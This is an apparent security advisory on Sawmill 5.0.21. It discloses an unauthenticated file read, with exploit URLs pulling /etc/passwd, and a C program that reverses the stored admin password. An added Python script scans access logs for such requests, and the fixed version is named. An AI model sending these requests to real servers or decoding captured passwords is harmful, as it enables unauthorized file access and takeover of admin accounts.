COMMAND

    sawmill

SYSTEMS AFFECTED

    sawmill 5.0.21

PROBLEM

    Larry Cashdollar found the following.  SawMill is a site log
    statistics package for UNIX, Windows and MacOS.  The tests were done
    under Linux.  In the test configuration sawmill listened on port 8987
    on the webserver.  You can notice two things.

    1) You can get sawmill to read you the first line of any
       world-readable file (if run as nobody) without needing to
       authenticate first.  The following will print the first line of
       /etc/passwd:

        http://192.168.1.65:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3

       You can imagine how much more fun this would be if it was
       launched as root, which it should not be and does not need to be.

    2) The password is stored with a weak hash algorithm (in fact a
       simple character substitution, so it is reversible) and can be
       decrypted using the attached C program.  This is dangerous
       because the previous security hole will allow you to read the
       first line of sawmill/SawmillInfo/SawmillPassword, decrypt the
       password, access the site statistics and reconfigure sawmill,
       along with the ability to browse the remote machine's drive
       contents.  If this is being run as root, then the attacker can
       specify root-readable files as log files and read most if not
       all of their contents.

    /* Decrypt password for Sawmill admin account.

    Larry W. Cashdollar
    lwc@vapid.betteros.org
    http://vapid.betteros.org
    usage: ./decrypt cyphertext

    */

    #include <stdio.h>
    #include <string.h>

    /* plaintext alphabet and the substitution table Sawmill stores in
       its place: each stored character is looked up in encode[] and
       replaced by the character at the same index in alpha[] */
    char *alpha ="abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_+~<>?:\"{}|";
    char *encode="=GeKMNQS~TfUVWXY[abcygimrs\"#$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";

    int
    main (int argc, char **argv)
    {
      int x, y;
      char cypher[128];

      if (argc < 2)
        {
          fprintf (stderr, "usage: %s cyphertext\n", argv[0]);
          return 1;
        }

      /* strncpy does not NUL-terminate when the input fills the buffer */
      strncpy (cypher, argv[1], sizeof (cypher) - 1);
      cypher[sizeof (cypher) - 1] = '\0';

      for (x = 0; x < strlen (cypher); x++)
        for (y = 0; y < strlen (encode); y++)
          if (cypher[x] == encode[y])
            printf ("%c", alpha[y]);

      printf ("\n\"+\" could also be a space [ ]\n");

      return 0;
    }

    Sawmill can also be run as a CGI script.  This method is
    vulnerable as well.  The following will print the first line of
    the password file:

        http://www.example.com/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
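    Both request forms above (the standalone listener and the CGI
    variant) leave the same trace in the webserver access log: a
    sawmill request whose query carries the rfcf verb followed by a
    quoted filename.  The following is an added example, not part of
    the advisory or of Sawmill, that decodes such requests out of
    Common Log Format lines and flags them; the log lines are
    constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (Common Log Format), not taken from any real server.
SAMPLE_LOG = """\
192.168.1.10 - - [12/Mar/2001:10:15:01 -0500] "GET /sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 HTTP/1.0" 200 512
192.168.1.10 - - [12/Mar/2001:10:15:07 -0500] "GET /cgi-bin/sawmill5?rfcf+%22/home/sawmill/SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1 HTTP/1.0" 200 128
10.0.0.5 - - [12/Mar/2001:10:16:30 -0500] "GET /cgi-bin/sawmill5?webvars+statistics HTTP/1.0" 200 4096
10.0.0.7 - - [12/Mar/2001:10:17:02 -0500] "GET /index.html HTTP/1.0" 200 2048
"""

# One CLF entry: client IP, timestamp, then the quoted request line (method, target, protocol) and status.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# The rfcf verb followed by a double-quoted filename, as in the advisory's example URLs.
RFCF_RE = re.compile(r'(?:^|\s)rfcf\s+"([^"]+)"')


def decode_sawmill_query(target):
    """Return the decoded Sawmill command string for a sawmill request target, else None.

    Sawmill separates command words with '+', which is also the URL encoding of a
    space, so unquote_plus() turns both '+' and '%20' into spaces before matching.
    """
    parts = urlsplit(target)
    if not re.search(r'/sawmill[^/]*$', parts.path):
        return None
    return unquote_plus(parts.query)


def find_sawmill_file_reads(log_text):
    """Flag requests that use rfcf to name a file; returns (ip, status, filename) tuples."""
    hits = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        query = decode_sawmill_query(m.group("target"))
        if query is None:
            continue
        f = RFCF_RE.search(query)
        if f:
            hits.append((m.group("ip"), int(m.group("status")), f.group(1)))
    return hits


if __name__ == "__main__":
    for ip, status, filename in find_sawmill_file_reads(SAMPLE_LOG):
        print(f"{ip} requested rfcf on {filename} (HTTP {status})")
```

    A 200 status on a flagged line means the file's first line was
    actually returned, which is the case worth following up.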

SOLUTION

    Sawmill issued a new version of Flowerfire Sawmill (5.0.22)  which
    corrects both of the vulnerabilities mentioned above.  The  update
    is free.